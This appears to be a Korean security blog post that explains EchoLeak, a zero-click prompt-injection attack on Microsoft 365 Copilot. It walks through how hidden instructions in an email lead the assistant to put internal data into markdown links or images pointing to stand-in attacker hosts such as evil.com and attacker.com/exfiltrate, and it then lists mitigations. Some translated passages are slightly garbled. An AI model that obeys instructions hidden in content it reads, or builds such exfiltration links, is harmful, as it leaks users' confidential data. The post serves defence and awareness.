소개 :
AI 비서가 당신을 도울 뿐만 아니라, 다른 누군가를 조용히 돕는다면 어떨까요?
최근 에코리크(EchoLeak)로 알려진 제로클릭(Zero-Click) 공격은 사용자가 링크를 클릭하거나 이메일을 열지 않고도 Microsoft 365 Copilot을 조작하여 민감한 정보를 유출할 수 있는 방법을 밝혀냈습니다. Word, Excel, Outlook, PowerPoint, Teams 등 Microsoft Office 업무용 애플리케이션에 내장된 AI 도구인 Microsoft 365 Copilot에 심각한 보안 결함이 발견되었는데, 연구원들은 이 결함이 AI 에이전트 해킹 위험을 더욱 확대시킬 수 있다고 밝혔습니다.
클릭, 다운로드, 경고 없이, 받은 편지함에 이메일만 있으면 되는, 은밀한 공격을 상상해 보세요. 바로 Microsoft 365 Copilot의 심각한 취약점인 에코리크(EchoLeak)입니다. 이 취약점을 악용하면 해커가 피해자의 어떠한 행동도 없이 기업의 중요 데이터를 훔칠 수 있습니다.
취약점 개요:
Microsoft 365 Copilot의 경우, 이 취약점은 해커가 피싱이나 맬웨어 없이도 사용자에게 이메일을 보내는 것만으로 공격을 실행할 수 있도록 합니다. 이 취약점은 AI 비서를 스스로 공격하도록 유도하는 일련의 영리한 기술을 사용합니다.
Microsoft 365 Copilot은 Office 앱 내 사용자 지시에 따라 문서 접근 및 제안 생성 등의 작업을 수행합니다. 해커가 침투할 경우 이메일, 스프레드시트, 채팅과 같은 민감한 내부 정보를 노리는 데 악용될 수 있습니다. 이 공격은 사용자만 자신의 파일에 접근할 수 있도록 설계된 Copilot의 기본 보호 기능을 우회하여 독점, 기밀 또는 규정 준수 관련 데이터가 노출될 수 있습니다.
Aim Security에서 발견한 이 공격은 AI 에이전트에 대한 최초의 문서화된 제로클릭 공격으로, 우리가 매일 사용하는 AI 도구에 숨어 있는 보이지 않는 위험을 드러냈습니다.
이메일 하나만 잘 작성하면 됩니다. Copilot은 이를 조용히 처리하고, 숨겨진 메시지를 따르고, 내부 파일을 파헤치고, 기밀 데이터를 외부로 전송하며, 이 모든 과정을 마이크로소프트의 보안 방어 체계를 우회한다고 회사 블로그 게시물에 나와 있습니다.
EchoLeak은 Copilot이 신뢰할 수 있는 내부 데이터(이메일, Teams 채팅, OneDrive 파일 등)와 신뢰할 수 없는 외부 입력(수신 이메일 등)을 모두 처리할 수 있는 기능을 악용합니다. 공격은 특정 마크다운 구문("like ![Image alt text][ref] [ref]: https://www.evil.com?param=")이 포함된 악성 이메일로 시작됩니다. .” Copilot이 사용자 질의에 대비해 백그라운드에서 자동으로 이메일을 스캔할 때 채팅 기록, 사용자 세부 정보 또는 내부 문서와 같은 민감한 데이터를 공격자의 서버로 전송하는 브라우저 요청이 트리거됩니다.
공격 흐름:
프롬프트에서 페이로드까지: 공격자가 Copilot의 AI 파이프라인을 해킹하여 단 한 번의 클릭 없이 데이터를 빼내는 방법 아래에서 자세히 알아보겠습니다!
- 악성 입력 작성 및 전송: 공격자는 숨겨진 프롬프트 주입 페이로드가 포함된 악성 이메일이나 문서를 작성하여 공격을 시작합니다. 이 페이로드는 수신자에게는 보이지 않거나 알아차리지 못하도록 설계되었지만, AI 지원 처리 과정에서 Microsoft 365 Copilot에 의해 완전히 분석되고 실행됩니다. 주입된 명령을 숨기기 위해 공격자는 HTML 주석과 같은 다양한 은폐 기법을 사용합니다.
- 부조종사는 숨겨진 지침을 처리합니다. 수신자가 악성 이메일이나 문서를 열거나 Microsoft 365 Copilot을 사용하여 콘텐츠 요약, 메시지 회신, 답장 작성 또는 작업 추출과 같은 작업을 수행하면 Copilot은 자동으로 전체 입력을 수집하고 분석합니다. 입력 유효성 검사가 부족하고 프롬프트 격리가 부족하기 때문에 Copilot은 합법적인 사용자 입력과 콘텐츠 내에 숨겨진 공격자 제어 명령을 구분하지 못합니다. 대신, 삽입된 프롬프트를 사용자가 의도한 명령 집합의 일부로 처리합니다. 결과적으로 AI는 숨겨진 명령을 실행합니다. 이 단계에서 Copilot은 자신도 모르게 공격자의 명령에 따라 행동하여 이를 합법적인 작업의 일부로 오해했으며, 이로 인해 공격의 다음 단계인 민감한 내부 컨텍스트 유출이 가능해졌습니다.
- 조종사가 민감한 맥락을 포함하는 출력을 생성합니다. 공격자가 삽입한 숨겨진 프롬프트를 해석하고 실행한 후, Microsoft 365 Copilot은 지시에 따라 민감한 내부 데이터가 포함된 응답을 생성합니다. 이 출력은 일반적으로 사용자에게는 합법적인 것처럼 보이지만, 은밀하게 정보를 유출하도록 설계되었습니다. 유출을 은폐하기 위해 AI는 (숨겨진 명령에 따라) 마크다운 형식의 하이퍼링크에 이 민감한 데이터를 삽입하라는 메시지를 받습니다. 예:
[자세한 내용을 보려면 여기를 클릭하세요](https://attacker.com/exfiltrate?token={{internal_token}})
사용자에게는 이 링크가 유용한 참고 자료처럼 보입니다. 하지만 실제로는 링크에 접근하거나 미리보기를 통해 확인하면 공격자의 인프라로 데이터를 전송할 수 있도록 정교하게 구성된 유출 경로입니다.
- 공격자가 제어하는 서버에 대한 링크 생성: Copilot이 생성한 마크다운 하이퍼링크는 주입된 프롬프트의 영향을 받아 공격자가 제어하는 서버를 가리킵니다. 이 링크는 이전 단계에서 추출한 민감한 컨텍스트 데이터를 URL에 직접 삽입하도록 설계되었으며, 일반적으로 쿼리 매개변수나 경로 변수(예: https://attacker-domain.com/leak?data={{confidential_info}} 또는 https://exfil.attacker.net/{{internal_token}}
이러한 링크는 일반적이거나 유용한 것처럼 보이기 때문에 의심을 불러일으킬 가능성이 적습니다. 공격자의 목표는 링크를 클릭하거나, 미리 보거나, 심지어 자동으로 가져올 때 세션 토큰, 문서 내용, 인증 메타데이터 등의 내부 데이터가 눈에 띄는 침해 징후 없이 서버로 전송되도록 하는 것입니다.
- 사용자 작업 또는 시스템 미리 보기로 인해 발생하는 데이터 유출: Copilot에서 생성한 악성 링크가 포함된 응답이 피해자(또는 다른 내부 사용자)에게 전달되면, 직접 상호작용 또는 수동 렌더링을 통해 데이터 유출 프로세스가 시작됩니다. 결과적으로 공격자는 의심을 불러일으키지 않고 인증 토큰, 대화 조각, 내부 문서와 같은 귀중한 내부 정보가 포함된 요청을 수신하게 됩니다. 이로써 공격 체인은 성공적이고 은밀한 데이터 유출로 마무리됩니다.
완화 단계:
Microsoft 365 Copilot 및 유사한 AI 기반 도우미에서 EchoLeak 스타일의 즉석 주입 공격을 효과적으로 방어하려면 조직에는 입력 제어, AI 시스템 설계, 고급 감지 기능을 아우르는 계층화된 보안 전략이 필요합니다.
- 즉각적인 격리
가장 중요한 보안 조치 중 하나는 AI 시스템 내에서 적절하고 신속한 격리를 보장하는 것입니다. 즉, AI는 사용자가 제공한 콘텐츠와 내부/시스템 수준의 명령을 명확하게 구분해야 합니다. 이러한 격리가 없다면, HTML이나 마크다운을 사용하여 숨겨진 입력 내용이라도 AI가 명령으로 오인할 수 있습니다. 강력한 격리 메커니즘을 구현하면 AI가 겉보기에 무해한 콘텐츠에 포함된 악성 페이로드에 대해 악의적인 행위를 하는 것을 방지할 수 있습니다.
- 입력 정리 및 검증
AI 시스템이 처리하는 모든 사용자 입력은 엄격하게 처리되어야 합니다. 여기에는 다음과 같은 숨겨진 HTML 요소를 제거하거나 무효화하는 것이 포함됩니다. , 너비가 64인 문자, baseXNUMX로 인코딩된 명령어, 난독화된 마크다운. URL을 검증하고 신뢰할 수 없는 도메인이나 잘못된 쿼리 매개변수를 거부하면 이러한 방어력이 더욱 강화됩니다. AI가 보기 전에 입력값을 정제함으로써 공격자는 유해한 프롬프트 인젝션을 몰래 삽입할 수 없게 됩니다.
- 신뢰할 수 없는 콘텐츠의 자동 렌더링 비활성화
에코리크(EchoLeak) 방식의 유출을 가능하게 하는 주요 요인은 마크다운 링크와 이미지 미리보기의 자동 렌더링입니다. 조직은 특히 알 수 없거나 외부 출처의 콘텐츠에 대해 이 기능을 비활성화해야 합니다. Copilot이나 이메일 클라이언트가 링크를 자동으로 미리보기하지 못하도록 차단하면 클릭 없는 데이터 유출을 방지하고 보안 시스템이 페이로드가 활성화되기 전에 검사할 시간을 더 확보할 수 있습니다.
- 컨텍스트 액세스 제한
또 다른 주요 완화책은 Copilot 또는 LLM 어시스턴트가 접근할 수 있는 상황 데이터를 제한하는 것입니다. 세션 토큰, 기밀 프로젝트 데이터, 인증 메타데이터, 내부 통신과 같은 민감한 자산은 필요한 경우를 제외하고는 AI 입력 컨텍스트에 포함되어서는 안 됩니다. 이를 통해 신속한 주입이 성공하더라도 유출될 수 있는 정보의 범위를 제한할 수 있습니다.
- AI 출력 모니터링 및 로깅
조직은 모든 AI 생성 콘텐츠에 대해 로깅 및 모니터링을 구현해야 하며, 특히 출력 결과에 동적 링크, 비정상적인 요약 또는 사용자 중심 권장 사항이 포함된 경우 더욱 그렇습니다. 마크다운의 반복적인 사용, 하이퍼링크에 토큰 존재, 또는 지나치게 "도움이 되는" 것처럼 보이는 프롬프트와 같은 패턴은 악용을 나타낼 수 있습니다. 이러한 출력을 모니터링하면 유출 시도를 조기에 감지하고 침해 발생 시 소급 분석을 수행할 수 있습니다.
- 사용자 교육 및 인식
사용자는 AI가 생성한 콘텐츠의 최종 수신자이므로, AI가 생성한 링크나 메시지와 상호작용할 때 발생할 수 있는 위험에 대한 인식을 높이는 것이 중요합니다. 직원들은 링크나 메시지가 "지나치게 지능적이거나", 지나치게 구체적이거나, 맥락에 어긋나는 경우를 인식하도록 교육받아야 합니다. Copilot과 같은 신뢰할 수 있는 비서가 생성한 콘텐츠일지라도 의심스러운 콘텐츠를 신고하도록 사용자에게 권장하는 것은 사회 공학적 AI 남용에 대한 인적 방화벽을 구축하는 데 도움이 됩니다.
이러한 완화 조치들은 에코리크에 대한 포괄적인 방어 전략을 형성하여 AI 시스템 설계, 사용자 안전, 그리고 실시간 위협 탐지 간의 격차를 해소합니다. 이러한 관행을 채택함으로써 조직은 AI 기반 위협이 진화하는 상황에서도 회복력을 유지할 수 있습니다.
참조 :
https://www.aim.security/lp/aim-labs-echoleak-blogpost
저자:
난디니 세스
아드립 무케르지
